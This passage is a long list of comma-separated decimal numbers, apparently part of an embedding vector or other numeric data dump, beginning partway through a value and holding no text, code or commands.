012817155,-0.020873694,-0.02227314,0.0060917153,-0.014543971,0.006577704,0.023986995,-0.017856454,-0.0105296755,0.01784204,0.0051229484,0.0022969716,-0.0068377764,-0.015277123,-0.003419648,0.011648355,-0.0028429548,0.0041188393,-0.011170484,0.0063690096,-0.0037000482,0.02732638,-0.005410649,0.023242466,0.0009653239,-0.011015411,0.0073379176,0.00975188,0.014327259,-0.007256551,0.026703,0.019134717,0.028268205,0.0074573928,-0.014064834,-0.020859215,-0.009834305,0.0052509783,-0.0093657635,-0.0078326445,-0.0011709833,0.014959571,0.01562932,-0.02221783,-0.013926233,0.0012113295,0.015992006,-0.009037298,0.0005969495,0.03258044,0.016123615,-0.009979085,0.020634301,0.015704628,0.008638573,-0.001009676,-0.03217242,0.002468008,-0.019176634,-0.017146353,0.0023851409,0.0027008513,-0.004285019,0.008668052,0.0033354266,0.0012561328,-0.022587398,-0.0045860414,-0.025092179,0.0012125776,-0.005900242,0.0075786994,0.0063674734,0.006243636,0.0029976028,0.0042718095,0.0014270816,-0.0013235747,0.014654964,-0.020932805,0.0072400616,0.00041522985,0.014614693,-0.0116476305,0.005346183,-0.0005345017,-0.003147342,-0.00383647,-0.025076674,-0.0089464495,0.009095028,0.001948804,-0.008397043,-0.017589252,0.000100123645,0.012744516,-0.015275842,0.0027821732,0.034822937,0.003684626,-0.0044393796,-0.0028285575,0.009479766,0.0037730439,0.0068794773,0.0018206021,-0.006287207,0.012181628,-0.026917951,-0.00537713,0.002619828,-0.00033755903,0.011718923,0.0008170193,0.0055896677,0.011912269,0.009636469,-0.007162513,0.0038430158,-0.020453546,0.029311629,0.011341638,0.006342927,-0.016738592,0.002792956,-0.02126546,0.020197565,0.0011360078,0.017376313,-0.011741787,0.015066473,0.013630413,-0.016565068,-0.0013627447,0.0043962854,0.0046325466,0.012388748,-0.005017127,-0.014205452,0.014721759,-0.007758321,0.0061128517,0.00930326,0.017703021,0.0052512074,-0.007823371,0.023864333,0.01840494,-0.016373474,0.010371363,0.0037731663,-0.03206676,-0.027609637,-0.001877209,0.025561282,0.020241195,-0.029627599,-0.031550962,-0.00031564364,-0.003479526,0.016658176,0.017379109,-0.018959966,-0.021262052,-0.008666322,-0.020864313,0.015571787,-0.023315517,0.007273523,0.008736732,0.032930467,0.017321177,0.003907738,0.0061221845,0.014320929,0.0024713997,0.011360061,0.00017790827,-0.017941957,0.016995605,0.0055829254,-0.012662669,-0.0013312515,0.006532124,0.020646702,0.0054088,-0.006671664,-0.016678452,-0.011587425,0.0029875834,-0.03521755,-0.005427805,0.0025095977,-0.0072514466,-0.010320691,0.0010093842,0.09146324,-0.004791518,0.015340865,-0.009904189,-0.0048670853,0.012461026,-0.0127118295,-0.012413273,-0.01958017,-0.006938926,0.0130408155,0.023727613,-0.0050205723,0.015229792,-0.016078928,-0.014961217,0.0111132385,-0.00011223669,-0.09180366,0.027644888,-0.002575466,0.0069550704,-0.013574525,-0.008309036,0.010916157,0.00050483755,-0.03290012,-0.012385715,0.00078977586,-0.009535827,-0.009321003,-0.006110882,-0.0067283767,-0.0043860595,0.018832693,-0.0064959168,-0.013882644,-0.015165508,-0.016255358,0.016602254,-0.0051951567,0.011214415,-0.0050714975,0.003640643,0.0089908615,0.040285062,0.023677984,-0.01687172,0.0063258265,0.014092747,0.0132821575,-0.01841336,0.021762246,0.004053009,-0.0070423726,-0.002474446,0.027556878,-0.0009458441,-0.0150796175,-0.002889669,-0.043336656,-0.013010238,0.017293653,0.010680387,0.013785357,-0.015377859,0.023266563,0.025735375,0.007673451,0.012463356,-0.02426642,-0.0281244,-0.014781412,-0.0056809685,-0.0012786265,0.004677942,0.010228352,0.0070295455,0.00023918595,0.018237628,0.0056882286,0.013036494,-0.002828311,-0.0008067962,-0.0024118775,-0.0059689754,-0.030881424,0.0012559675,0.008892125,-0.01915124,-0.01151167,0.030411016,0.00095313723,-0.0012048116,0.0043380884,0.022320323,-0.008899647,-0.02449781,-0.019505206,-0.019995037,0.00084319315,0.018204356,-0.021044126,-0.0037176807,-0.004096335,0.02541872,0.001329201,0.007978354,0.0008310102,0.013743088,0.029532121,0.011169918,0.014037178,-0.032290943,0.00026908328,-0.017156575,-0.0006537896,0.00612844,0.0040603415,0.0056630475,0.004013375,-0.008470206,0.00847036,0.024037138,-0.03921028,0.011567243,-0.020297907,-0.008711517,0.0006093552,0.00040765462,-0.017984312,0.009807509,0.0071578533,-0.0058187833,0.0009998878,0.015858091,0.030743998,0.0067054154,0.031159831,-0.0033369828,0.026450414,0.013823503,-0.01078612,-0.022569902,-0.0049984218,-0.0058533777,0.005353168,0.007044732,-0.006699101,0.006308423,0.01086595,0.009246189,0.010120579,0.026637742,-0.005573519,0.00044542743,-0.0033599986,-0.034751203,-0.0062880027,-0.008018938,-0.02101431,0.012273706,-0.014283918,0.041232865,-0.012237873,-0.022948097,0.007292507,0.05981923,0.006376289,0.0018830467,0.009319888,-0.022890449,-0.018760754,0.021689082,0.030815614,0.012579674,0.0024845884,0.0014793011,-0.031968106,0.0041023986,-0.004369234,-0.022539021,0.01608298,-0.009119854,-0.015764609,-0.029064124,-0.016110852,0.022782678,0.012230799,0.02525856,0.0086760465,0.015582234,0.036245625,0.0062325727,0.016002368,-0.0015709543,-0.018211521,0.009267673,-0.018663332,0.009868214,0.009501948,-0.03594648,-0.0037301853,0.0020924548,0.0049524573,-0.02003518,-0.0131657785,0.0075770468,0.033325437,-0.010183794,-0.014365289,-0.023067221,0.021268964,-0.00783313,-0.006067911,-0.017349856,0.020073066,0.0018181225,0.02358057,-0.0267032,0.0080785155,-0.005410047,0.013135983,0.0051764385,-0.049361583,0.0450688,0.018162595,0.016433405,0.019353975,-0.0041815755,0.018412672,-0.013474325,0.007746821,-0.01808164,-0.007439919,-0.011151266,-0.0051272307,0.010494987,-0.0041310904,-0.024051294,0.010796897,-0.00026833333,0.008330214,0.005317761,-0.014554122,0.013857916,0.015594017,-0.00053045695,0.010761356,0.011193655,0.007539258,0.025479257,0.0028758212,0.013060556,0.010084991,0.008821317,-0.01822087,-0.0038890827,0.0102502685,-0.0022007169,0.0021878793,0.029852454,0.015807966,-0.008688434,0.005914072,-0.007591636,-0.0033641623,0.00468204,-0.018943068,-0.01122405,-0.014212055,-0.0010363711,0.0023825553,0.021820877,0.00046328342,-0.0011499797,0.041090872,-0.021116845,-0.0038807609,0.017287772,-0.009399076,0.01080375,-0.03427622,-0.017244,-0.009632555,-0.0017557038,-0.018237427,0.024949253,-0.0032458692,0.00823204,0.010116862,-0.008293119,0.0129371835,-0.012418981,-0.012519992,0.0007823339,0.010074889,-0.0032856455,0.028221758,0.016271194,-0.035253964,0.000335084,0.00067444163,-0.025659269,-0.024106883,0.02867901,0.014723051,0.021851383,0.017408703,0.032926537,0.008447302,0.0132699115,0.026431452,0.024998192,-0.0028632258,-0.041175444,-0.008397814,-0.0063392776,0.0055427183,-0.013472868,-0.0057032513,0.018422777,0.01172292,0.02444805,-0.01891354,-0.003305132,0.020069823,0.033234872,-0.03415813,0.009353872,0.0024166966,-0.011988576,0.0397532,0.014811665,0.038839456,-0.010981933,-0.019856289,-0.0058753006,0.02003781,0.026559392,-0.008808704,0.007503254,-0.031282626,-0.0009880062,-0.0049351305,0.009951871,-0.012868656,0.0076642763,-0.026818616,-0.018020537,0.003389237,-0.00074616016,0.005741575,0.00307982,0.008600361,-0.011742815,0.004153354,-0.039060913,-0.002984866,0.0023602818,0.0042710635,0.0046482617,-0.003636281,-0.023964936,-0.010611933,-0.0019052989,0.010180224,-0.0009377492,-0.009006373,0.008872418,0.035158027,-0.019004432,-0.008018964,0.03297795,-0.018166486,-0.0051536034,0.008968885,0.031099837,0.017577449,0.0030859848,0.00789107,0.015566431,0.0060072634,0.0121048195,0.009948127,0.029060572,0.018796727,0.009086772,-0.011112502,0.0026363248,0.010804287,0.009044715,0.008468601,-0.00007775686,0.003594286,-0.011258719,-0.0036479346,-0.023480631,-0.03367525,-0.019511241,-0.0118669355,0.0025162264,0.004183476,-0.017676216,-0.0014356211,0.0055748327,-0.015831873,-0.00012856706,0.018984333,-0.0013954414,-0.015918761,0.03338586,0.006147612,-0.003135633,-0.01305263,0.011307578,-0.011454129,-0.006737361,0.0083620455,0.010098653,-0.005299831,-0.003208734,-0.0043615084,-0.0052915243,0.011866671,-0.011417564,0.008946942,0.001261415,0.027781524,0.02145494,0.01546383,-0.033729374,-0.0029652708,0.003788406,-0.01946775,0.0045746216,-0.019632116,0.01993167,-0.0077615203,-0.018379224,0.00020182254,-0.020971848,-0.011081698,-0.015013449,0.012479445,-0.07952719,-0.007045488,0.00014728443,0.024255589,0.0006000378,0.03913044,-0.00031000306,0.0014462154,-0.008834859,0.004266491,-0.011923834,0.003020572,-0.023507057,-0.013240893,0.015798546,-0.0010735253,-0.0415454,-0.0058158385,-0.0137994345,-0.007930317,-0.019655226,0.0290008,0.014195306,-0.00433223,0.0024827356,-0.0016035013,-0.01656494,-0.015115625,-0.022521235,-0.03704267,0.001516683,-0.0055916007,-0.02595712,0.009067858,0.0045457045,0.008143528,-0.011995013,-0.03044423,-0.0040064435,-0.001963632,-0.0029286745,-0.025988437,0.0016635811,0.0060730195,-0.016106725,0.02139011,-0.038011633,0.0089013325,0.01460338,0.024878385,-0.0006115576,0.0015008238,0.0009704134,0.013654848,-0.016460527,0.01162401,0.0053489013,0.03563808,0.011352578,-0.0041094683,0.008351299,0.003777975,0.0022171405,-0.018285314,0.0007131765,0.024960363,0.02880205,0.0036565214,0.0133954445,-0.0015580506,0.014301615,0.015337994,-0.0023754684,-0.0065249153,0.027625388,0.008794663,-0.0042307293,0.0050103613,0.0005000386,0.008913952,-0.014956628,-0.008709828,-0.011828887,0.032975692,0.0116403615,-0.007296771,0.01590102,-0.0038790216,-0.0020589968,0.01652444,-0.022584883,-0.0113950195,-0.014366967,-0.024953168,-0.004864304,-0.020895744,-0.00014263202,-0.033111166,-0.0049205148,0.015629075,0.01833712,0.005501499,-0.029089727,-0.002021002,0.0010306488,-0.0069400547,-0.027279062,-0.019169047,0.0023464535,0.02972143,-0.02249604,-0.008928036,0.014698858,-0.01030362,0.012956142,0.011625737,-0.0186511,-0.00866941,-0.008997948,-0.010722559,0.018247906,0.016606377,0.022717118,0.008005229,-0.03436803,-0.00059259724,-0.00816692,0.0012861132,-0.0039578625,-0.007236827,0.0044194595,-0.005838679,-0.015750054,-0.011640662,-0.030164896,-0.0048320317,-0.0022723812,-0.03831078,-0.010335063,-0.021156255,0.016670758,-0.0053686793,0.015395998,-0.011974461,0.039917618,0.025385315,-0.015725764,0.015691465,0.0080371825,0.022179151,0.007279848,0.044739194,0.0077885543,-0.035522837,-0.024128126,0.00578787,0.00087972835,0.01382413,-0.010355054,-0.024806833,-0.014849697,-0.035781685,0.00634323,-0.024277978,0.011493566,0.0029764601,-0.04333786,0.026025698,0.005854876,0.007983808,0.009766603,-0.0017148461,-0.00041747026,0.008063679,0.0012196855,-0.038659643,-0.018458137,0.0077430727,-0.004614777,0.019008778,-0.0004706394,-0.030373473,-0.020733036,-0.021938415,0.013277592,0.0007342136,0.03488986,0.02458654,-0.0021665664,-0.0025869648,0.007842339,0.009717138,0.0039657066,-0.03840443,-0.003175565,-0.0069803866,-0.0071400655,-0.010799767,0.022641107,-0.022290688,0.03212711,0.010478091,-0.01733996,0.022472534,-0.0022063674,0.013990529,0.0057323943,0.009046064,0.007857144,-0.022561949,0.02066253,-0.026184928,-0.0019019546,0.035677057,0.0008306359,0.0052837753,-0.0016502523,-0.011321198,-0.016156556,-0.01148819,0.00025464268,-0.027116865,0.018447777,0.007721552,0.0005472304,-0.0018399805,-0.0058329036,0.031456817,0.010324372,0.01738619,0.015592419,0.000047987985,-0.036079496,-0.010482913,-0.005877543,-0.010743417,-0.0023370206,0.011535249,-0.0007044589,0.0074048014,0.026391251,-0.013538426,-0.009250083,-0.005747253,0.00828485,0.0003296561,0.006500017,-0.004494404,-0.008379357,-0.014739606,0.03492668,-0.00930832,-0.014537757,0.0017822984,0.013855318,0.019592227,-0.047612853,0.000031429892,-0.013802632,0.008429443,0.022258043,-0.016966876,-0.003607167,-0.020504825,-0.012246812,-0.008795362,-0.019732023,0.013168388,-0.024472184,0.0049833236,0.01790233,0.00079805934,-0.013678435,0.018145485,-0.0019925397,-0.0022780353,0.009273593,0.0012524119,0.002816221,0.00007538182,-0.010530756,0.015286712,0.016204288,-0.0015259074,0.014636158,-0.016876092,-0.027269123,0.01762118,-0.006599069,-0.023616461,-0.01255544,0.0011659805,0.01230481,-0.0110643115,0.0075295814,-0.038297657,-0.073793165,0.011640632,-0.008031154,-0.005507539,0.005783099,-0.013843843,-0.0012047206,0.013135824,0.02862478,-0.008078937,0.011268149,0.0011092313,0.011040522,-0.0056115733,0.0055566505,-0.0018418977,-0.010562225,0.0038246121,0.020062916,0.010036181,-0.0067178635,-0.000012705863,0.0038755117,-0.007448474,0.03394234,0.006269788,-0.005360213,0.0026016112,-0.031156268,0.007172582,-0.003919629,-0.013458148,-0.012958437,-0.01086214,-0.024649508,-0.010915564,-0.0046480843,0.021306045,-0.0076957387,0.0063197548,-0.01361266,-0.021640494,-0.0063709123,0.023959998,-0.020096947,-0.015408476,0.00021704719,-0.006374392,0.014910626,-0.010875198,0.008967131,-0.008329571,-0.0117121255,0.018233428,-0.009238633,0.019117225,-0.0005530058,0.03401353,0.034334328,0.014889236,0.0043875137,-0.008455557,0.01415731,-0.0044777985,-0.020235937,0.0058364994,-0.004442772,0.01914731,-0.008395495,-0.010456189,-0.010124777,-0.0056812586,0.005275125,-0.013196866,-0.010515684,0.0063943025,-0.009121917,-0.022065712,0.00058251375,-0.021047994,-0.012679912,0.012355451,-0.0101953,0.002226545,-0.015706904,-0.021304347,0.004098761,-0.0022791529,0.0008102452,-0.008854835,0.00272958,-0.018276105,0.0007518929,-0.0059209024,0.014213479,0.01186099,0.004518173,-0.009346935,-0.00457899,-0.011685338,0.018757321,-0.010565155,0.0050393357,0.023258328,0.0087233,0.0012235362,0.004860066,0.024191683,0.021102974,0.023779932,-0.01679101,0.008987681,-0.0061456296,0.01195919,-0.012572337,0.0073486567,-0.01311009,0.012322225,0.057075415,0.022634009,0.024024801,-0.0030060953,0.027339859,0.0048986315,0.0023044958,0.005222396,0.0048595564,-0.006843378,-0.024355423,0.013440936,-0.011523999,0.006804551,0.025344247,-0.012729631,0.0033177864,0.024866968,0.0062626908,-0.013573225,-0.024281615,0.009789949,-0.014956272,0.0142235495,-0.019467406,-0.0044231894,0.024878712,-0.0045193494,0.0037532644,0.0052061756,-0.0023818219,0.018028108,0.012528735,0.0055551217,0.01658559,0.011922464,0.005745014,0.0013218782,-0.0030423845,0.00065521523,0.02261715,-0.0031760384,0.00020553994,-0.02294449,0.011491881,0.015050775,-0.012534568,-0.006933322,-0.0050062514,-0.0027362113,0.005213931,-0.011515183,0.0022856265,0.021713486,-0.009125866,0.03017821,-0.009344034,-0.010888638,0.020637471,0.010273296,0.0006689493,0.0135383215,0.009794085,0.048403252,0.0034766495,0.0018141776,0.009427462,-0.015135613,-0.0041956888,-0.024599947,-0.023558853,-0.017235655,-0.008574717,-0.0022337085,0.0014600375,-0.0039700177,-0.01148916,0.041185465,-0.019888533,0.028184239,-0.0031986483,-0.009405603,-0.005890979,0.026593456,0.016514277,0.008674311,-0.0015569837,0.018661175,0.014553239,-0.018172389,0.0038361016,0.000984562,-0.018181104,0.0017444418,0.0020159131,-0.016095182,-0.022309726,0.014241439,-0.0005934824,-0.011336745,0.017013399,-0.031987283,-0.00027169075,0.028930664,0.004479324,0.009304538,0.0010013328,-0.013114357,0.009546608,0.015717933,-0.002727407,-0.014327071,0.021329114,0.0059731747,0.024621377,0.022242105,-0.032133617,0.0037910903,0.0009404016,0.008100225,-0.00049600145,0.007852981,0.00817768,0.019119306,-0.0036202865,-0.017249614,-0.014998783,0.02020099,-0.004997597,-0.0062690666,0.011226569,0.031677518,0.0064929123,-0.004300353,0.008707172,-0.0043411525,-0.031093342,-0.0033090166,-0.03002932,-0.018326748,-0.0014289387,-0.018797765,-0.009166529,-0.0040659294,-0.020981442,0.00047071904,-0.017716205,0.007882546,-0.0030319572,0.016479786,0.044201694,0.001548772,-0.0011190015,-0.009088041,0.0052106837,0.014644574,0.009874149,0.001428329,-0.0122384215,0.0006645706,0.0014369938,0.01699042,0.006884874,0.014603831,0.008674628,-0.020259531,0.011863047,0.023744304,-0.00046722678,-0.016002329,0.006806663,-0.0060593197,-0.0115555525,-0.0044491417,0.0062575266,0.020122819,0.0152050685,-0.0035789504,-0.011194205,-0.018138617,0.004971647,-0.015279949,0.090839125,-0.009849417,0.028093902,-0.0036280386,0.01725481,-0.015009139,-0.00450687,0.011455278,0.013204729,-0.004465564,-0.027206317,-0.023265047,0.012200799,-0.016778924,0.008068506,-0.0043669315,-0.009457133,-0.00058782403,-0.0023644778,0.008710962,0.0014820376,0.0008069572,-0.008016462,0.007427781,0.017330198,0.022442272,0.010044259,-0.015699713,0.009885739,-0.004449133,0.0043129073,-0.023228006,0.0026655542,0.017244104,0.019115224,0.0012080857,0.022766052,-0.012454988,-0.0073263417,-0.00066843175,-0.016323162,-0.015240828,0.026901266,0.01240188,-0.010328668,-0.0047097793,-0.01614902,-0.002801851,-0.005603957,0.0054810955,0.011456435,-0.0046429997,-0.012856795,0.011455075,-0.037885558,0.013073426,-0.0071530878,0.013357105,0.0073573384,0.0011173201,0.010398838,0.009996829,-0.004793838,-0.012808073,-0.007660975,-0.0074105305,0.024386566,-0.02186939,0.010703755,-0.021283383,-0.0043309107,0.0034560293,0.0012529178,0.013749427,0.0021282774,-0.00048533274,0.014704018,-0.016469859,-0.010066015,-0.020059785,-0.0027943137,-0.0035380272,0.037716657,0.0050447006,0.0063388436,-0.006764119,0.02105761,-0.0018310018,0.066500954,0.022672564,0.0025738494,-0.037562795,0.008845515,0.035526123,0.020043863,0.02592483,-0.0057381643,0.0073085846,-0.023833243,0.009044631,-0.013457972,0.00019391748,0.026997259,0.0010998416,0.0038209353,-0.008155946,0.0052787103,-0.012259752,0.0020845798,0.038843263,0.0067037754,0.0039618416,0.005326627,0.0014102169,-0.009547368,0.0117572,-0.00014392108,-0.0013058339,-0.008209227,0.00056992203,0.008392932,-0.009181873,-0.019206842,-0.059913475,-0.0013392896,0.18529117,0.005452388,-0.012769615,0.04066336,-0.0006680867,-0.002309774,-0.15739168,0.008675301,0.012050857,0.00925837,0.0013061868,-0.010457886,-0.007512794,0.018758515,-0.00014482057,-0.008440239,-0.017753124,-0.015713463,0.013556565,-0.01953208,-0.011465583,0.011191668,0.0129186455,0.022557702,-0.032380935,-0.009745009,-0.0015289021,-0.001810949,-0.009685051,-0.009673177,0.00004912837,0.0060404604,0.0034501252,-0.011308761,-0.013777466,0.012604643,0.007743881,0.016237061,-0.032586683,0.0018543353,0.026782587,-0.012376025,-0.01614841,-0.02279166,-0.16861655,0.0062669157,-0.0021524127,-0.04370897,0.023978833,-0.029693423,-0.0062910877,-0.0042776098,0.018441336,-0.025316317,0.014866736,0.042286687,0.010858395,-0.007026984,-0.010697132,0.012205958,0.01308583,0.012123113,0.005724163,-0.004107519,0.012853553,0.0038677454,-0.00515297,0.0024969692,-0.015840258,0.0039905002,0.010728835,0.026455618,-0.010441209,0.0062732208,-0.0026537525,0.013975419,-0.014159397,0.018399589,-0.013105396,-0.036025684,0.0007749301,0.0069257156,-0.012936939,0.030931536,-0.008146398,0.012661598,-0.00826277,-0.00072344014,0.0012049044,-0.0020665294,0.03799903,0.016304636,0.007841693,0.004670377,0.02469334,-0.005324033,-0.01244868,-0.0103740515,-0.015030363,0.0063633644,-0.026288118,-0.014324334,-0.010596985,-0.0006761287,-0.0030901427,-0.008388616,-0.0143852765,0.011778432,0.0154379355,-0.018974138,0.0068668467,-0.032939877,-0.005017106,0.012470956,-0.004052779,-0.01205032,0.017216494,-0.025009071,-0.003897778,0.009621855,-0.018787224,0.005569812,0.018110417,0.000049166258,0.00017765604,-0.0126036685,0.000500405,-0.019312767,-0.0025964226,-0.020943169,0.007447794,0.0066962657,0.0021242185,-0.0061462047,0.02348918,-0.024912039,0.017170995,0.016556883,0.017741533,0.0006202683,0.023531523,-0.015303618,-0.020670705,-0.0066396636,0.0016929208,-0.018718757,-0.005876437,0.014242023,-0.023097044,-0.0048407917,-0.0008739826,-0.009138577,-0.02105054,-0.0057088993,0.012673069,-0.009994467,0.018212706,0.017524645,-0.02492463,-0.002102986,0.0065007447,0.0065350826,0.019352235,-0.022343393,-0.035404023,0.0066574593,-0.018669017,-0.0069036023,0.02515608,0.003070115,-0.0049292264,-0.003448072,-0.005267313,0.018273076,-0.025997791,0.0012698681,-0.0012125961,0.010770489,0.0044366904,0.002367104,-0.0051924447,0.00405851,-0.018909002,-0.0075202244,-0.010361448,0.016880602,0.0022073255,0.0015428842,0.002719709,-0.006654195,0.047472306,-0.009761065,0.03228035,-0.008068645,0.0014449512,0.018591985,-0.026383344,-0.030777395,0.005357312,0.08559621,0.009649525,-0.005432036,0.008753496,0.00932199,0.0054967613,0.027522527,-0.016672049,-0.02899851,-0.018170692,-0.0011868603,0.015542085,-0.0032177467,0.011788003,-0.014861423,0.026425103,0.028119685,0.0109770065,0.0009660286,0.010230007,0.011857286,-0.016797177,-0.0041063135,0.037480384,-0.0071632704,0.015864797,0.020062085,0.004297368,0.0030833355,-0.0032849945,-0.0047113914,-0.0060821944,-0.02386826,0.0023334448,0.0022337746,-0.027284235,0.010787205,0.0017699425,-0.004257519,-0.013289436,0.009946849,0.011274842,-0.0019279764,-0.02323415,-0.00010120517,-0.023392776,-0.0063932096,-0.0025800406,0.001277601,-0.0051387013,0.0003983673,0.011733663,-0.019062957,-0.0024719778,0.004750731,0.003312808,-0.010329574,0.00094028533,-0.0004871845,-0.009596023,0.03843912,-0.010724236,-0.024030209,-0.006492603,0.006923243,0.012436373,0.0018884138,0.0065470925,0.0031180186,0.0068066586,-0.0054257386,0.0067703775,-0.013229456,0.014665487,-0.0033238789,0.004658666,-0.010016958,-0.006201525,0.003189731,0.015980838,0.012352378,0.0048673395,0.026877616,-0.017775647,-0.0018100169,-0.04751061,-0.019606145,0.042132273,-0.024981549,-0.0069881617,0.0071308496,-0.005856107,0.036260657,-0.0062135905,0.013407124,-0.014998219,0.015999343,0.011337188,0.022892784,-0.0025651993,0.00910513,0.008454721,0.0040163216,-0.02354127,0.003824612,-0.010347926,-0.007909787,-0.0072805327,0.023075262,-0.019236159,-0.008762738,-0.019836677,0.0051502855,-0.026618434,0.008949483,0.030442959,-0.013158801,0.015613334,0.020458551,-0.002497196,-0.024043763,0.0034818598,0.019872243,-0.01713254,0.03933744,-0.026294272,0.012390345,0.014150745,-0.036323745,0.0066722278,-0.007257872,0.021402676,0.015762065,-0.013423693,-0.01370575,0.009370861,0.0069959336,0.015132193,0.0008625518,0.0075676343,-0.008806124,-0.009996112,0.0034007258,-0.009760956,-0.019349003,0.0043991185,0.026426814,-0.0154664535,-0.027843243,0.01301677,-0.011209885,0.0022389372,-0.0012566304,-0.0059114327,0.007379088,0.024519186,-0.023663137,0.0044772658,-0.012954679,-0.02365057,0.020217441,0.021228263,-0.0049208514,-0.008453249,-0.009703105,0.024351198,0.028536798,-0.005595853,0.006423648,0.0031499013,0.0072615813,-0.02115746,0.0048821275,-0.0027035784,0.002401879,-0.014773183,0.018236265,0.007942293,-0.011339997,-0.00906355,0.008113001,0.015133833,-0.004632052,-0.011521113,0.0112210605,0.013384561,0.0029615702,0.026263086,-0.015405067,0.012957671,0.0024983364,-0.0071402905,-0.012526636,0.0071382537,-0.046036914,-0.016006472,0.015244215,-0.02534497,0.009433621,0.011843449,0.012169463,0.022437016,-0.018272761,-0.013022805,-0.0028163905,0.014230858,-0.001896578,-0.019447926,-0.007631152,0.005627188,-0.00252428,-0.009458974,-0.0006113626,-0.000048073805,-0.002445015,-0.00028523267,-0.008862237,0.022232158,0.013096857,-0.047212385,0.014783351,-0.0148589825,-0.012162352,-0.010741237,0.011069369,-0.010888788,-0.018015094,0.033823207,-0.019509211,-0.019478325,0.00580179,0.035003368,0.01669559,-0.0020891693,-0.006183798,-0.02346188,-0.034086823,-0.027966794,-0.039471965,0.0009950199,-0.0066218385,-0.03824774,-0.014695089,0.01756784,-0.006427483,0.0027445778,0.016149571,0.03159557,0.012548997,0.008525456,0.009113985,-0.022379119,-0.0146808885,0.007340717,0.020938557,-0.012019843,0.019999588,0.0031696395,-0.021245165,-0.021091914,0.0041804845,-0.009332591,-0.008935416,0.015412453,0.0047211405,0.007605933,0.008088035,0.03718329,0.019312015,0.0036991558,0.007632103,0.016715018,-0.012918042,-0.015954373,0.024252592,-0.021399926,0.0066601397,-0.021793092,0.009510068,0.031258654,-0.0013614179,-0.016707156,0.006636984,0.0066260197,0.011709965,-0.024066003,0.012062879,0.014924555,-0.0067744306,-0.023682486,-0.0046344604,0.015026267,-0.010666911,-0.016047582,-0.008676991,-0.0046820794,-0.004867193,-0.0073860423,0.0011919586,0.0077486723,0.016660722,0.004838285,-0.011459706,0.02475093,0.010479606,-0.02798558,0.0110680135,0.0003638298,0.0027844878,-0.008460088,-0.014086178,0.0057753655,0.0010560598,-0.0055407733,0.011503047,0.005187838,-0.01047291,0.026527105,-0.011181729,-0.0010573083,0.0064666863,0.0021985944,-0.004325231,-0.009032349,-0.020493293,-0.004266876,-0.031790163,-0.032541126,0.0032499302,-0.013789857,-0.002081538,-0.01876132,-0.0007422877,-0.13613872,-0.008871378,-0.020875115,-0.024358232,-0.0064348406,-0.021360062,0.007207544,0.0126952445,0.0034031454,0.0023549069,0.0063079842,0.020739289,0.013874501,0.012260153,-0.006365808,-0.0031138684,-0.023099858,-0.01564169,-0.005350045,0.01792385,0.009822087,-0.016569195,-0.0011035562,0.004963116,0.010264484,0.009179265,0.0071993,0.0047761444,0.0065236506,0.004313385,-0.0038339838,-0.0051266067,0.020357536,0.012269089,-0.003960561,0.014429579,0.017286789,0.017208895,-0.008300466,0.0013983242,-0.010206212,0.004484372,0.004218169,0.017198889,0.026439874,-0.000051205185,0.008623806,0.02212844,0.03746094,0.009993573,0.0065353094,-0.0026261923,0.013945046,0.0045480267,0.017435491,-0.018387366,0.008277137,0.004837198,0.008209548,-0.0032214138,-0.012303106,0.004207969,0.0049849977,-0.012101115,0.013184195,0.003928175,-0.008771478,-0.00814986,-0.02056801,0.0029750303,0.015800148,0.014785365,-0.004550615,0.0018984772,-0.0056183436,0.00060575275,0.009576934,-0.019163312,-0.03084969,0.011339275,-0.042488802,0.017766805,-0.0013481153,0.022714837,-0.014294953,-0.023167636,0.008991351,0.03342166,0.007964163,0.025099643,0.0041846735,0.008183595,-0.013498445,0.0018236157,-0.010580794,0.02639711,-0.009281994,0.015106013,0.0014184321,-0.020828946,-0.0054133716,0.0048356634,-0.012765447,-0.010091521,-0.12991259,-0.0073492867,0.02275322,-0.008218369,0.00030184677,-0.008718982,0.010034322,0.0005430655,0.012174647,0.022618476,-0.007534628,0.005848079,-0.023252094,0.009949918,-0.0070926785,0.014762057,-0.03129399,-0.0008701288,0.0032161663,-0.011853741,-0.008567949,-0.010557631,0.0084668705,0.018044481,-0.0149794435,0.020115145,0.012650682,0.03393542,0.04650604,0.0077877208,-0.00002053242,0.027762575,-0.003212478,-0.011066844,-0.04571715,0.022084692,0.00686525,-0.020892736,-0.007617005,0.0076123765,0.00052813976,0.012270399,0.011567783,0.023819,0.008684804,-0.014392332,-0.017179828,0.01955288,0.01186494,0.00196638,-0.008786737,0.007586269,-0.013496563,0.007903918,0.010557058,-0.0000049151586,0.005212189,0.007063682,-0.00052253954,0.01318759,0.010935596,0.0021096177,-0.011563988,-0.010378935,-0.013260255,0.008211062,-0.011193897,-0.015907237,0.0103324335,0.018671595,0.0030006175,0.024102416,0.01355926,-0.0019166481,0.016244708,-0.018686697,0.016961593,0.0060133217,0.023912597,0.009339236,0.007721455,-0.017802244,0.0027085007,0.004230448,-0.02539,0.0068508144,-0.014993016,0.008920435,-0.01202787,0.018690106,0.013466921,-0.000674792,-0.00009965079,0.007496735,0.005660151,0.0080170855,0.04426847,-0.0030319875,-0.016101556,-0.003563529,-0.011269617,-0.011887854,-0.0027087117,0.0019349545,-0.025955783,0.023836987,0.041646812,-0.0068542208,0.004938414,-0.0077556437,-0.010841584,0.0109804105,-0.012313087,-0.005273516,-0.0020177846,0.009079831,0.008999645,-0.00039787308,-0.018157838,-0.01441775,0.021918794,0.014491393,0.005067083,-0.019552985,0.0038781126,-0.011486918,0.0039890134,0.012897508,-0.015942212,-0.023306103,-0.0036275052,0.0035389161,0.010399523,0.0030525664,0.019253185,0.007980154,-0.013572017,0.009584585,0.00988859,-0.005836129,-0.0022857913,0.01138573,-0.009827726,-0.00009495677,0.013530793,0.012465796,-0.031929027,-0.016951926,0.016086869,0.0040493337,0.009628023,-0.020406825,0.02487633,0.012378532,0.008193105,-0.00031531692,-0.013092989,0.011620145,0.014054119,0.004063252,0.006333989,0.012940627,0.01728675,-0.010472867,0.001669328,-0.006715517,-0.011183878,0.005084617,-0.000057549692,0.013441083,-0.008712659,-0.0036067544,0.0034762584,-0.04749925,0.0032057725,-0.00039992202,0.0037778453,-0.009499071,0.017172156,0.021432117,-0.010390318,0.0055413446,-0.010959695,-0.008199861,-0.018483873,0.022481143,-0.010817284,-0.008785252,-0.011525171,-0.0051765526,0.03315695,0.010408056,-0.0078467075,-0.0073061697,0.008466391,0.0009282947,0.00636939,0.024546485,-0.0065335548,-0.002555406,-0.034235355,-0.00040555134,-0.005696943,-0.006115609,0.005430654,0.015357025,0.005655593,0.030998254,0.0014781215,-0.015404647,-0.0062738652,0.016695758,-0.007615362,0.00031559105,0.013892034,0.016465534,0.004057367,-0.015456721,0.03983